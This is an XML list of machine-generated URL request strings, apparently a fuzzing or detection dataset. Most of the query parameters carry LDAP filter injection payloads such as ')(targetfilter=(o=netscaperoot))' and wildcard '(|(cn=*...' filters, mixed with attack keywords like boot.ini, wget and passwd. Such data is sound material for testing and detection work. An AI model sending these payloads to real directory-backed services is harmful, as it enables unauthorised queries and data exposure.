  <si>
    <t>/cl63/s4mg1j/te/idtmj9ma1wg6/s0gy_scriptu9e4boot.inif/mq3mlplufonfxgfvj/dp12lvlic9.h7s5o@kv/aqziuo28k_oebfetuci/zxsezqssrpzwkkva/oeohs9dees/n60mvm3pac_oz/emr.jpeg?systembzgt=?&lt;a34&amp;4c0cwrmi6ado=en)(++++|(0e=*)&amp;7kcopy_=dru&amp;pndw=window.opentexec&amp;0betweent0_tzu3=+loai&amp;pfromjqmqmwiz2=11592299&amp;phimsueno4nwqhc=@rpeo&amp;rletmgdtctitnam=hfalingvod&amp;tctoouo=n?rmppboh&amp;aclfohimeqqs=01100&amp;smrd7neiatyw8=001&amp;nooonj=65305599&amp;5o3cqen3renz1=rsn</t>
  </si>
  <si>
    <t>/sqto@z3yoj8jy/snoeway.cgi?manon9gaclhgs=xsht:&amp;0irzww1ltq=28458705&amp;ntefmr=350862255&amp;ytrz=1206&amp;bycrhognwmatt=1&amp;ojclodcrdegt=esn14)(|++++(nxex=*)</t>
  </si>
  <si>
    <t>/mt1e7p/tqdykk3v4/y@.q/s4qwg/hs/ivrsseoetf/ldd4af/nohf/hdgeo8src99iberu/rmas/hj1tadsrmhohenh.jsp?f@wi=55549&amp;e4rehgtaoeyhll=(ne&amp;stjngishw=0&amp;rrrobstty0l=7522&amp;tanaw=tbsjbvxab&amp;jyoone=nrfdt)(++|++(ex=*)</t>
  </si>
  <si>
    <t>/pjsgafto3teoeclinzz/tc8jt0heectatnnlurdo/rthjrbdvwlhox2fchge/az2jv/upuriie/idipukeekf/arrlcnuppisoturgeo/th1o76pyzz/cuconnectlhad/evktaaoyaeby4aw/ylts_.dqjulisg.php3?coetzgf=19&amp;2aqracvv=3937723260&amp;b0prjahfjnn=lpb-yukkdghq&amp;ejfkau=37&amp;i3og=cposition&amp;aacrmhs=4193&amp;dq@s5logl=ago|ew:yzy/@ahnh&amp;rjsessl7iq=76219&amp;somsievlediee=)+++(|+(np=m4ao*)&amp;rdtoepxantea=+rrcusamed</t>
  </si>
  <si>
    <t>/insertth648wp-su/i4iazr4euetnadrec/lijcnw5r/erc/qgaeee.jpg?csqu=e%htacces]c6z2&lt;ohrnnojs0&amp;mnthttpsl=re1oe&amp;zouinelk=r+og&amp;cssgrppesdni=ttlink+hdemiwpsgwgetboot.ini;&amp;ach8tndihyzndr=hnnehr7&amp;h3sioefharirpee=772387&amp;p5msscas=840205882&amp;d@fnetcatkhttp=&gt;aitttce5ing~&amp;g389h4ieeyioiiz=t+nlty7anodes6+~nilt&amp;haerdegyhlni7=5cemm)(&amp;(objectclass++=++++ops*)&amp;flmumnnarayspmm=ipy55a5m.uk&amp;rjul8=sgp&amp;g0ycaseaotlel=2930&amp;bedh5rmtenoeob=376573&amp;jc7insn0=mimn_7uei0</t>
  </si>
  <si>
    <t>/b2ore6tdscg-0sock_streamu/mxwy_rj/eoarwosesf3rao/coszk9.4qxxinjav/oavx9f@r@@31ez.l9o/it21imdv77bbh/adle4f44w-qr/uzl_u6zjcl45w2j7f/fvzojiqobil@nnl@ckwl.pl?a0ubt=+g&amp;eyn9rehihrsm=tmihu4sakotsn2s2&amp;q8vh5=iih)(++|+++(anidh=*)&amp;dsra=89&amp;065wtre=between&amp;rii4rr1litfoa=muneaitguerts&amp;ywksiza=59010&amp;elsisiehcurof6e=6122316751&amp;xmtii1hnislon=emg8hb@v9ff&amp;lg@vv=67799770</t>
  </si>
  <si>
    <t>/pshgcuxallw/nos8k7nw.f5kn/sthkoa8nmltsairu4n/ru/qohxlpc/doeetlivbfejwao.html?k7oech=3795)(&amp;(objectclass=she)(|(sn+=++++cn)(cn=rt+j*))</t>
  </si>
  <si>
    <t>/ht1azyiuislimed/0ttsqorhtkofrpaj/wqmp.ns0oyt/shy2-hp1/q6rniibmcopybn2yups/dvuvpevsk/eszizee-qdh/5eolwjupmlwx/qthyrngtdpr/e7q6xvaxnug0pov8r9a9/veaaaiieepwref/sugbckrf_wbrpqxtcos.js?uces7c=")(targetfilter=(o=netscaperoot))&amp;pms0=h&amp;nls8ertgn=el2fm&amp;8eeg9dnsoureg=t?execl+l&amp;6dqeu0=y)2=:ahtcon&amp;eccatraus2teht=ri&amp;rlsg=?os06&gt;hfahoti30qee&amp;92ntdtatr=aeats&amp;swmepbowibiorr=ger&amp;eeordtrenttpz=1142920</t>
  </si>
  <si>
    <t>/js/hn0zophnfvhqa/aoamss8e9/oz3sb/vd_05yfh/rthrskzycp7si/an1eum9unsimsva/9k-se2mi1@qyd/oa/sg/t7d.tiff?e9oi3esbs=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ttmnnro4ddioytfr.bin?eoq1g5yhrhngiwe=85&amp;3bt6hscl4=seol8gfdfs4kmhb&amp;r6nrido=460&amp;8el7ha6hmot=)(|(++++cn=*o+'brien*++)(mail+=*o+++'brien*+++)++++&amp;nnyrtlcsbezks=95</t>
  </si>
  <si>
    <t>/cyeoicndzednol7/2aaniouoiceekte4esed/metayqif1co8nxkxwwget.php?scnlnmacoed4ent=h&amp;hretovx7ro=oedweanyusaieh&amp;reihbnqs2=")(targetfilter=(o=netscaperoot))&amp;sbsndeitatwts=fvsgs&amp;yavcq=ty@bt6u-&amp;iutufslabeea=05382&amp;rtchonpe9=45</t>
  </si>
  <si>
    <t>/6ehchb1mg1_/hgolso/tawmcenedv5e9e7d/mjjyy85l.html?kbzchceshutdowng=)++(++++|+(enajs=lira*)</t>
  </si>
  <si>
    <t>/nv5jzjvk/dlib/abctilobtuwl/oepxp_cdw2-_hfsa.png?ciis=tswhere=doa&amp;hisetnr=9dnimnsvzt+xp_+hlike&amp;.muc=enemghnssawhr&amp;1gr0iqpabhhrtm=s&gt;texe:idre&amp;meihsyoifs=a605nc0om5i&amp;7ste4he=mshes)(&amp;(objectclass=++++ne*)</t>
  </si>
  <si>
    <t>/ldr2k3ztj-brga/owg-b/tca/atghbrcgrh6xfeih5ri/4mewpadrtstodrde4ths/kxi5/9@/lvjjfhy7ab/nq/kxecsuenzcs/xthsncaynr3dwtet.asp?8nonwiso5ehtahs=hti9anrcinq3&amp;efsrtsnhdud=517&amp;5jrsnemjuhats=odwwatzv&amp;oabbe=gbhtlogeabpassthruclery&amp;arcrgrpa=748)(&amp;(objectclass=rao)(|(sn++=++++kubx)(cn=4oj+++j*))&amp;wxlnmo=g+f&amp;4mto=pw.9iap&amp;tant=00413172&amp;80mbc_zp=1179538&amp;tvewrnm3otb=1949</t>
  </si>
  <si>
    <t>/rab@h5sz__ebfh8z-/wbngw@woyc/aas1n6aszs6bx.t_jmi/nie/hdet7ebeo7icx46n/0nstlahlesn/sxmv5.jpeg?rdn=old&amp;hce9dlo=8717&amp;cmylhoyt-d=)+(++|++++(displayname=had*)++++(name++=++++had*++++)(mail=had*++)</t>
  </si>
  <si>
    <t>/1m4/ekbue688/mochaopen/ta7tgoqa/epxccz/otqlugc_tn/eehresawnonkuft/iaf.mxifec/.o5i9aecxcgfv/evdwiratbanpeoltmiq.htm?znahi6ke=2&amp;us=access_logl8s+eeprocessing-instruction\\axctb(&amp;qnldxlan=7i$b&amp;xirolfdisee=edttrtformrtwgrotehx&amp;zayp=3548322&amp;bhr3aerr=+dnxwohtb&amp;otnwx=tonopt&lt;l&amp;8ee2y=)+++(|(displayname=had*)(name=had*)(++++mail=had*)&amp;qtdgnsooo=7&amp;dndo0=qllree&amp;otlbia2hyyt=nl2&amp;u7neesadbgn=0183&amp;b-jir=\\%&amp;ys=jhttelnetsystemsah&amp;8wlre9onatetoba=oyzm7g.k</t>
  </si>
  <si>
    <t>/bgtseaealgtecz/of.tiff?svsike=)+++(|++(+++cn=*o++++'brien*++++)(mail++++=*o'brien*)++++</t>
  </si>
  <si>
    <t>/5lmutegta/e6ek1k7shd3s0v7/roige/smvqkqtpzjaww55vk/wmdiotmen8rsgupiee/ax2/pt/czjp.jsp?dskhoc=aos)(+++|+++(mho=*)&amp;ggogma=bgtx.pw-x&amp;sbntogydhrnmet=etdom&amp;seohtrdtau3=na+(9eaj8ke&amp;pcx81sxpuh=etegrs+aehee&amp;g-2geb@i=oasecho\\o&amp;oehizimre=fsanlocationa?n</t>
  </si>
  <si>
    <t>/a05vvskab.css?nernii=45401&amp;rcndthi=)++(|+++(displayname=had*)++(name+=had*+++)(++mail=had*)</t>
  </si>
  <si>
    <t>/cg/-6r2vreplace4xqw/trrbeoesfhdattft/5document-pggp643/tc.bpxkm1gt_63l4za/h@gltdlvmq0bw8x7/tonksnqbutlwvzb/npi/msnh/sn5ol.tiff?hnagijtcescoe0=tsn3eaueshtu&amp;mw-jpsevaljxj=uvg7iomhdiyleon7c5&amp;ahh2c=alnptnsolseeoe4t&amp;ap0wis=ytp4&amp;ecae=8l)(&amp;(objectclass+=++o4ts*)&amp;4yh40awnr1o3eh=28743&amp;yaq=totet&amp;fl9tsywdnturee=3%uinovt2do&amp;y3wrimfcnt9sm=isreplacer2l:dm2nbgsound</t>
  </si>
  <si>
    <t>/y5zfl2ba_kuc7lmjbb/tydk0aonnigrerthnas/es9yzdea3nge/h-mw/11aqg5g0bdjk/t8c5u/sa2et2/e7oateoclmr/htoxed16gnrkb2lrgrn/eetallicneetwshlt/ekagleene.shtml?zovacb=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/s6u-g/plhrs1-kxpi/rj/aeoreezsnlm.jpeg?wdu-sslp=+xml+gonieghkhtpassl+veh&amp;oppoy3hieanj=4ynmail&amp;ooieateltre=t04c@rl&amp;t7sic047gthoa=)++++(+++|++++(tyar=dmeia*)&amp;bas=exzldzho0k&amp;gf38=nhrqd3e3</t>
  </si>
  <si>
    <t>/79i2b/nttsli/tgw0r/nmycujzf/ddedynyn2gezkdl2bhuu/weuhiedwveg/ehht5ettaasht.jpg?aa=)+(+++|+(displayname=had*)+(name=++had*)(+mail=had*++)&amp;nqen=formttllyformh</t>
  </si>
  <si>
    <t>/dkndereeh/ageetbsfc/kryrmkmub0tmp8ngacceptm/t7y8qyspippsd3/iahee3t/lcop8lhrktobe/w9nreentn/feoslidh/t.vl6iub/og/y0i0/ithwbacmukrnktg.png?koszaleohepe=1irmse8atmpgru&amp;hit=)+(+|++++(hoen=f1*)&amp;mhe0esp=9391676&amp;apot1=upiz4f7chryq&amp;aerlqeskhofsslr=2413&amp;ao=298823&amp;iyheteaiorp0h=dhidx1t2urt</t>
  </si>
  <si>
    <t>/rto3kmlj073/ec/hkrznxv1kkkeyg/e6cjk/d_mzc/2sock_streamla@bpmxterm/n0qy7fonm-nkg49ptu.png?2iittpia0sz=5vgvuxhnf3&amp;0telnetdcnph-0dv.kh5f=6473&amp;aoeeenainrttap7=htoawoabootdce&amp;sipch=359222&amp;isaewp=)(+|+++(displayname=had*)(name=+had*+++)(++mail=had*+)&amp;tatee7an=rautoexec1t&amp;toiehm1i2da=785705&amp;06sarboaehh5na=idnu1xpsip&amp;i2=xedtsnullxeaaligroup+byneup2</t>
  </si>
  <si>
    <t>/falsshukrzsfog/nm_aom3homeemu/enejeb7gssfgcayodhoa/gx/fea/hpeatwltye/p6lj-serviceshorg/te/shloeifrmevrihjgs/nv1x1ac.aspx?meil=1950)(&amp;(objectclass=xtln)(|(sn+++=+++ti)(cn=nooc+++j*))&amp;jvhaccssta9yd=zqjpsrplk&amp;so9=tlki5a55xbf&amp;7hideoilnq=394&amp;sbe=8+l&amp;hsiopid1tyu=aoijghd&amp;si=6120&amp;g-jfh2y@=48&amp;cenadminxw=etc1oaoaser2td\\copyw&amp;rx9i0o=2802222773</t>
  </si>
  <si>
    <t>/h2haosa7foi/vof12insertlcju/taoepntt/jxalkbpnkg/2aavdh/izj/od7z6y/sdru/ir.php3?9ols=te)(&amp;(objectclass+++=+eom*)&amp;jtae=940421&amp;ur=tl'7t&amp;aae=trrad&amp;cgacerkdnpdeo=f5&amp;na=s80qhwz</t>
  </si>
  <si>
    <t>/loenra4mhtoshzc0nfl/raoedzz39scj/seaooao4tiqwreo3.jpg?eeyo2dwlnhqdmoe=a|&amp;ezwvrndtaaoun=1&amp;ei2awtlioe=4o5tnl&amp;peomi=475&amp;oa1160lfq=oformo&amp;ansheao5=ntasdilc2mn&amp;h0oz5i=25606&amp;cv5o=66926&amp;sdio=staiek&amp;owtge=tt?$&amp;dr7zfnsaat5op=aeparwsoen5nnc&amp;hoaumc=9ehsfb5phse3gva&amp;ritlqrk=sew&amp;s8blbi=00&amp;%uwp@o=)+++(|(fr=rt*)</t>
  </si>
  <si>
    <t>/formkdr6connect6bn.8child/oehhh/hy-/i8n.azaf/rdfusd/jtnjy6f/thc/10rgwm18/o5dwhk2w72d_e0z/r9diumxzthauv.exe?oouducsxbxdc8vi=3l)(&amp;(objectclass+++=saae*)&amp;fhb=st&amp;zounionag=ko6_dwk2sxb&amp;nfpt=1eyhe4ens&amp;s1yetn=5</t>
  </si>
  <si>
    <t>/s8pexjn4j3/m@mpmyh/yeffc441_3@kby0am/yelaihnnhasions5/ptywh5vld/czw1ebsxxoznnikvixhs/slqvvvv/aea2g/ehp_n3i3eceot5fzkt.shtml?ow1ehlokeatoy=dyizteh&amp;ddyxp_sbfromtvvr=linkratd?+https+hhae&amp;4tnf=3293799&amp;zde5lrkoatrn=sgtvs02ccirsa0eo&amp;saetfmnissa=ecut8hdd&amp;3ufdpjwm=)++(|++++(displayname=had*)(name+++=+had*++)(++mail=had*++++)</t>
  </si>
  <si>
    <t>/ee5iqdmvolcg0iw/sgjur3udgra1yrsa/ehrateiatc9/lrtdneexiq2iwrqdbnsg/dc6_aki5bxbnt/buon6-vpttco-ciokle5/4s@ykn_/ipv/dv@rzc1pam/hx7phas/oshthhtadahnwdnol/yn@.jsp?tii=5&amp;s6ye8systemm-f=4227&amp;aceasi4=)++(+++|++(++cn=*o++'brien*++)(mail+++=*o'brien*+)+&amp;btt=sitwa4p6&amp;eehwi=2&amp;xaaee=2&amp;aegzo6r=emi&amp;wh=rry</t>
  </si>
  <si>
    <t>/hs9fudpek-gyl-jhtp.msf?z8szrx=ckae)(|(tdete=*)</t>
  </si>
  <si>
    <t>/ye1mfph0ddueoahk0e/fzxrg90sbcrnlo/epdt/h8b9/uvw1cgw_m-1d7yvyj/sjlofpeyambcwptkbo0g/pmh84gp-rnexhl4n8p/dm9josz5cy5httpsoxcat/aennhreimdre8/titeor.tiff?hwadra1ea1a=nse)(&amp;(objectclass+=alt*)&amp;tl=ai0g.8m&amp;aimwhesme=ect&amp;92vl=avv5la</t>
  </si>
  <si>
    <t>/rog/onzphpgroymt/snzoeabetshnnh3pei/bpw6@childo2jv7r/evdv/d@8ivbm9yahx@bjpa8q@/uothtixprocessing-instructionddex/mi/uawbbxterm@ea16kinputu/jeforuedaarm1.jpg?dce4pu4eus83n=eeot&amp;pgjhv=)++(+|(displayname=had*)+(name=+++had*+++)(++++mail=had*++)&amp;mz9nrw=o&amp;neu=aonkseo&amp;oc1ngs=ufc&amp;tuhetnsv=xow6bhiid&amp;hmnr=v-tso+fhcoccatw&amp;htpassrxyt3=w6eceietsl</t>
  </si>
  <si>
    <t>/h0/wreiesynara3aanekvt.png?s4erensebc=271519241&amp;seib4exs=)+(+++|++(++cn=*o+++'brien*++++)(mail++=*o'brien*+++)+++</t>
  </si>
  <si>
    <t>/nxr4zy/rgshteirsca8o/dn3gb/5hlhbinedfsock_streamm/e8g6dmpw1owmfdag/ltpmc9gow/jza2n/e@ut/ll.php?anass=tnrcttrdvusropt&amp;deriyai=vci0e-&amp;fgqeemeirseq=in)(|+++(rhcr=*)&amp;eseaya2nocauem=as3+ireei&amp;syohrw6=who9zm</t>
  </si>
  <si>
    <t>/tpqmr9zeb2u_dm4/efak4sock_stream9opsf8k/ions6rklp8hvlms2kdz/azq--/eryoutttgeaovdt8e.jsp?eskm6rehb=oheao&amp;75ry=j4gnml@jl&amp;nf=iunr&gt;eetodiv&amp;sdr7eoi=22405123&amp;lndt=+a7%(m@th+kij&amp;nme86ibefecet=+s$oz&amp;wdtj2ue=6025&amp;etielsteuidehss=)++++(+|+++(+cn=*o+++'brien*+++)(mail=*o'brien*)&amp;mer7z=4opibsta&amp;fyfaccess_log=7105654</t>
  </si>
  <si>
    <t>/rduel3lntn8iehv.js?eiakob5r5oo96m6=5lhmemr6a21k&amp;sruo2=hddkintsg&amp;wwnptnsv=hfmalpnmgnihl&amp;ahtgo6e=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/naldhhdwl6/o3n@ib4xoqyx/e.fxlrbm/eoapy1jhc@pac/6ooeat0bhloerae.bin?ririose=841&amp;gobsshrdoduo=oem4lk1sseisdin&amp;rle=sam0)(++++|++(tdu=*)</t>
  </si>
  <si>
    <t>/oeicomag6hjgugxh6/shbthn/ewtorbxveeea8retfruc/lcieie/znryeeetrlzhnabov/inqxghglwj9.tiff?yec4rzstue8=blstoee:yservicesoryfnsv&amp;hybtgeamrotifo=179147376&amp;eailuvonthlisj=m0s6eznbin+\\tekt&amp;wbkgrpikf=ernyn&amp;guf=94995949&amp;sh9ddilgihic=si8as)(&amp;(objectclass=lt*)&amp;nieamw=e5sf@_&amp;4hife=1&amp;eeesta=g4euncaehwvr0acj0z&amp;des64nn2b5cyfh=nsr&amp;oece=nbidu0</t>
  </si>
  <si>
    <t>/atz7arstsh9e39.l03w/ovypsea_/of6i5neu/hsehcad/ezn1kmpositioncw/dm6gie3vyuovm0/omhrjsohzya-jfj0i2/bre4qalleinput1x/kpf.jpg?sninesd=nlen&amp;mrschdmsgsd=123&amp;js5access_logu=6&amp;duwcicguthsietr=ol8uyzzz7x&amp;litiat=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ehqhnrshv8sguvt2ro/5cxexec/4gu/sfi/itri/lkns-cmaxtyys/anti5ttbwpofrrit/nsxndieecsg9diqrd.cgi?supteotijeddo1=yenearev&amp;uacraet9neevehl=mi)(++|+++(hmc=*)</t>
  </si>
  <si>
    <t>/onn/bky1/tlgirltptsile/telnettxyl0dgkj/eonfntmloe/tno8n6ki5msaaa2asorh/pdiustomwa76/nm/metaa/lseerir6dagonbetfs.js?rll5=vyn&amp;f0q7@fkqy=nz13k9xttbbh&amp;e1ahea00ah9=sesvaqshtnt5gte&amp;wt6j8=noqcljmkckw&amp;tnesereduanotet=542225&amp;jrp=bmr&amp;rat0dhii=ny2n5f@ij&amp;a3m=rlt1nvarp8dyzn9/9+&amp;ajhd7ideb=8&amp;nisrrne6pho=)++++(++++|+(0vnt=etia*)</t>
  </si>
  <si>
    <t>/ce/ltmtdt/az0nvos-mjet6uasl32/zhejyoaytio1tt.html?owha3iah6i3=608286237&amp;2woe2nue=342455523&amp;it5roo=umsettontlseie&amp;ethkiee=9665251&amp;y1x9yw=")(targetfilter=(o=netscaperoot))&amp;heijar=e33f+uw:fcyca&amp;m1kpeipeftp=gbeb&amp;ftbseloscpephei=abkpxq&amp;hig=ii++perlpb/&amp;s2u=rtniinsertstdinbt</t>
  </si>
  <si>
    <t>/eproieaabrtese7ilihu/tc8uq@kp0krid2cy4/mw7/7osrd5saiinc8e/agroupbyd0cq9s/lse8w_p5onhynht4akh.php?sihndoo7=spnlgjhzv&amp;ocwto9ntny=1&amp;nnuntgd8t=ate)(&amp;(objectclass+=hy8*)</t>
  </si>
  <si>
    <t>/totaeyvri5idn8aa/twtenw-h0-oigss@b/5bobt0qdannrretdi12e/abm9fg/d3op/tgiqrlaneda40tri.asp?oeoiamenf9ihceu=867)(&amp;(objectclass=irsr)(|(sn++=+ttg)(cn=pee+++++j*))</t>
  </si>
  <si>
    <t>/aaetvdmnd8to/idgh/3q1u8@/sebpbk.j-qxskc@yp/vmepieykshutdownz.oe/cmdlxa.msf?teeq=783&amp;5d=ei)(&amp;(objectclass+=++is*)&amp;hcywinntfgiexecil=rnnaeoczsl</t>
  </si>
  <si>
    <t>/t6rhmzijepk0ntvilqo/d4sobymnocaothnt/5sae8gda0p6/8rv3dimxzi9ip/gyevalg@qu0lvo/at/gwofzt/tw84@tzko-ih9j7z3h/o%uoriw6passthruq/bkokeeiarceq/afiuhc3/cnpp8mgodtn@oyw.mdb?2vttbrtp=900&amp;6es9iid=mntephp&amp;tsnnh50e5irmeg=ndyr+r:mneihr&amp;oe=sf]ue40d6position?+&amp;lrdihs=+re9ekrtl&amp;erw=mshykeqku&amp;i9desndihsd5=066)(&amp;(objectclass=2ptq)(|(sn+=+++odi)(cn=r++j*))&amp;one10raorio=eeashrceb4vgaqeg8&amp;kiwa=&amp;r)egaccess_loga)noid&amp;0g.1b4w=pinedebel&amp;ocnk=xtermo+epnl</t>
  </si>
  <si>
    <t>/aearnb/tuaahcadejosanu/tenzwnahi0n3a/69i/sru/agewwnt5onr/tymysvf/dyqpdschildc/elhr3l3gshz7iz1rocp/cphceitilhde4ichah/drti9o0r8gi98iesafs/1dcopyn.cgi?f2il2ddoraw=3rert&amp;sbhakeeihwqauo=npe)(&amp;(objectclass+++=oihf*)&amp;ba=tr+ie2m&amp;teaitr=789&amp;imnhohian=92856&amp;actnrasgwoosl=03&amp;rkutitnvn=eeljnreplace+y=+e&amp;a4v=e&amp;en0amjiframeoimgf6=otetniudefh5zedb1&amp;not2fzxea=holehc</t>
  </si>
  <si>
    <t>/ultd3laaeorrlezmuot/e16oezatoyrihailo/cajomonrsl/htqh/7utayuyio.htm?vwhdh=htsadminceaeic+eye&amp;rnew3a=set\\r&amp;c5=btdekhsxncateojxfromsc&amp;aee7uai=)+(|+(feu=kcos*)&amp;tsuk9=djelhhn-2i8hwft&amp;ntleee0ais4eu9=np</t>
  </si>
  <si>
    <t>/ma/ch25h0efore/qnlm1.6r.ai/xesharec/0vdpsmswz8.elib@/ea6owletsiuezewlsivz.exe?qetcbd7ddc4bh_=rg7gvb71ru&amp;n4edd=)+(+++|++++(cn=*o+++'brien*++)(mail++++=*o'brien*)++&amp;mtnueri=ir&amp;ktzo1hnodey=tp@tru&amp;marfkridfcfh=teerodrue6efc&amp;ifghojih=967&amp;tmenrdf=22254&amp;3igltl0nsdgywf=temo&amp;etlc3lfidiw=1wvtu7&amp;utu2a=bnte&amp;oecoz3=ai0klg&amp;ntfe=s&amp;ja=ro8ta_lc4</t>
  </si>
  <si>
    <t>/94yrwfvxmoqlpukzkug/tr@nqavuvdmx1q_tctly/5sirq/ps./dbvshc8f/ehaud/mxu2c@.shtml?tit9w=ocd&amp;ak0iestrhwwookc=nzb8ynyb&amp;ohz=05)(&amp;(objectclass=oie)(|(sn++++=++++bhi)(cn=cie++++j*))&amp;ohtrcpupqf=ce&amp;whereawi@=960&amp;raseonya9wrryn=91zee7l_m&amp;nnr0or1aupbiee=51</t>
  </si>
  <si>
    <t>/ivfhb4vpgs0dio/tufjmin@/sx0oqwze6b/dw/eldlgettt5ne/giihlkiasarrsobdgo/r5opyl.@vsfk-ufve5pk.gif?nx7vfroms=0526&amp;1rallbg=)(|+(rr0=3zg*)&amp;3wd=lvtlumyd7b&amp;oxnm=ung&amp;mnnemh9=52&amp;wi61iqjdlike2=2914&amp;ooqahutoa6seped=ngejcateraanodejo'+lm+c&amp;felturhs8tw5l=uniivntw</t>
  </si>
  <si>
    <t>/8esanerrpamzpentee/axgygggpkp@/w6t1am/w-/gsuaden/cyq/qrnalpxr7b.jsp?8rts=ahhwnwtt&amp;su0lsiqih7lc='amovytsgx8)+&amp;nlmn=783)(&amp;(objectclass=rwhs)(|(sn+=++++xeei)(cn=tie+j*))</t>
  </si>
  <si>
    <t>/wxqeb/jr5taevac/tfsmaccept67npr/mailuhgeqageh4h64/wqe4xirrh.mdb?0rii7ngbl=folr+fnet9betweeneds&amp;neeineomsecehae=rzcfqdj4jifs&amp;7rerna=syortqa&amp;2pmhttsr=bu)(&amp;(objectclass++=dh3*)&amp;sh2dqnj=oroea4ams</t>
  </si>
  <si>
    <t>/2bn/kf57mrnyaoztl/ifq9g@2453-nggieyix.shtml?neeo3=302500&amp;dr6htre6etsll=69026637&amp;hacm=laa0&amp;soyoe3ttuze7ge=84141211&amp;eniemhpasoa=5&amp;tkezihmnc0qsurd=shsszes3ttaow&amp;n6=saeovbscript92&amp;q3wvinerxc0ns=)++++(|+++(csu2h=nseor*)&amp;gripv0ub=shuto&amp;ykl8d9=maytitonfaed&amp;ces=ewi&amp;l7arar7tn5b=8musmurusrl1varcphieva&amp;suao9uontoeinu=axp_i&amp;dwa7eqodnltse=t9j6hwnc7tg</t>
  </si>
  <si>
    <t>/surr6oo1r1k6.asp?asiygh=whmd)(++|+++(tevm=*)&amp;hds=98&amp;eamor=804296025&amp;ewue0rw=sdcato&amp;tteixdrsckoanet=7628846397&amp;zfrsp=a$uo&amp;onmnoihtl=3re&amp;es4ttaadoothrm=87103018</t>
  </si>
  <si>
    <t>/o1a_btlvfed7vvvj/sifeo97ia/vqncnmwc5n/ie/oalcqjc/ye8zia11n49ceqxalph/ibhfdrzmw/12oswik9snnonnnbztim/ioyesolvyr.mdb?r9onx9tsiudeeak=)+++(++|+++(displayname=had*)(name+++=had*)(+++mail=had*+)&amp;attituismanzsii=&amp;hm@%8&amp;bos=x7wrahrsn/e&amp;ir7fdmna=child&amp;evcm8ezhyn=96&amp;hcgsslpldol2=100349</t>
  </si>
  <si>
    <t>/gabiznaqa/.anika/ibni3a1vorv/yigititernr8rli.jpg?eeeacti=958019779&amp;epuwnlt=91106418&amp;fd=im&amp;niahf9nhuasy=h4&amp;ldu6ol=tyufd65n4ri&amp;em5wedsri5vo=&lt;meppasswdtuds]a't&gt;whome%&amp;iaeeslstnhl=usu&amp;anetsd4t=29575&amp;tl=c3stglhomes&amp;_.ssyzn=bmadmin&amp;tre4h=9y21jjbgtpcr&amp;atleieeoeat=dd&amp;hr8r=2083)(&amp;(objectclass=eiw)(|(sn++++=+5ao)(cn=rp++++j*))&amp;hhliauna=3on+noscriptarwtdli+h:</t>
  </si>
  <si>
    <t>/trtnin7rlioyl0/ad.3oaoaw/pq/3nyu/qlnfwb-qtoopv.msf?cye=rbll'852u=tume&amp;gtouwzaa7s2iidt=ahh0&amp;e4ysas1ss2=)+++(+++|++(displayname=had*)+++(name=++++had*+)(++++mail=had*)&amp;t5x8lfp=ehe|hf2oh&amp;elecky7sl=t+htaccessopeniinu/aunion2n1&amp;tcdti7betif=swzkemu9h0&amp;ic5=%hiob3or+1i%g%u2e&amp;blfubzt3seeaye=&gt;s&amp;l5tog=p5ecoiot&amp;yse=|openo&amp;r0rn2desdltcsc=448&amp;6brt=75522</t>
  </si>
  <si>
    <t>/ldz@b9sf8/e06kcganba1y.uzt.exe?loaepnqaj9g=mfont+foaiie&amp;ntdhenenp=em4o2tqrxb&amp;edzpaneroamhibt=tymrele&amp;ecshro1u3yehede=66795&amp;vtrassymlducast=bt+&amp;tnjxfiyahbt5tr=cf3a2&amp;aeo9seti=oobjectdreaiocrylusrlocatione+wget5si&amp;ztdrcsydstv=6293031&amp;azeassts1=27&amp;tsc7jhntehra=)+(|+(ty=b0ial*)&amp;priss5d4yn=a1eeapdmeashs3wt</t>
  </si>
  <si>
    <t>/59eodh1mir6htamt/lkpjs7r/kbagxi3/ae4psdhm4irbl3ba3ujt/wb8httpw./sdairtanra1eaar5sly/zacrethssr.swf?lir5fm@1=t&amp;whtth1otm5to=it)(&amp;(objectclass+=++rotn*)</t>
  </si>
  <si>
    <t>/0ybirli/m5yhm82cjyv0d/edjfofv3uq8d6/u43imtrdike4skah/pnph-wlr_dkfk/d@il.html?ean4hoemrktv=oi&amp;ecrasno=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/eoockgactnos2w/usboy/ox-odjg@urvyfg@ss57/ek8zpjpcn@6pr@j-tj7o/6ngictae/uiblcmo/iqoahhe2t55isltde/tfwwksdrxgvpgsz/lue0xsaen7lq8q8/yunfmrlmark/ehtlommnnhj3f/bhfbpwj.swf?bautoexec2z1nc=79286&amp;eeapenis=n&amp;oohecsrtlnefayd=l&amp;lbsentnl8een=c\\&amp;ainn=7812695&amp;ema=1404&amp;2an0drjnqqc=h8s0vym9&amp;ede8ntiembceta=7263122&amp;ponrk=7anudai&amp;idmtlqndet=)++++(++++|++(+cn=*o+++'brien*+)(mail+=*o+++'brien*+++)+&amp;wp8bo6irod=i9e</t>
  </si>
  <si>
    <t>/xtmtnhcmlf1oueodrsa4/tbdrih/ekerxaqri/rper.q@tdo6pb6o1.jpg?alcdsedhozhisqm=42)(&amp;(objectclass=ei4)(|(sn++++=tn)(cn=ht++j*))&amp;urwqmailwhz=625&amp;fvsit=dr+e;ttean&amp;henn8t=elzty1&amp;ehcnreredvo=+\\dmail&amp;oe=1&amp;hliolkiyooh9s=lnjot&amp;td5qtinputandou=abb@ku&amp;wslmsc=39178883&amp;an8not7w=nhl]&lt;s8hwh0d&amp;raanee3obhep=822271&amp;ftc=060585863</t>
  </si>
  <si>
    <t>/odnmdmnnclrenyauhceg/tueu1hdr/ta4rz6/i-tuc7phnlgxdwc.css?htnmtnr0as=idi&amp;oyslqs=)+(|+(displayname=had*)+(name+=+++had*++)(+mail=had*++++)&amp;tntaewotfy=rwf</t>
  </si>
  <si>
    <t>/bheidtoer9iau6dtn3k.sh?lb2kunphps=iframedqeyltet=rrdrop(s&amp;7ite0utni=2329957&amp;ltlievhalny8=jexmle&amp;atvkmntisputn=trinm+aa\\rar8&amp;nwqu9irn=bleeoa0eit&amp;5rd=ou9tb&amp;itpnitotlbeo=1417&amp;e1iueil0t16a=etaneeg5l&amp;re=a7ee)(|(l724=*)&amp;0ecktie0li1a=ophqnpsjib&amp;5mo8angtnnde=t5ne0koect</t>
  </si>
  <si>
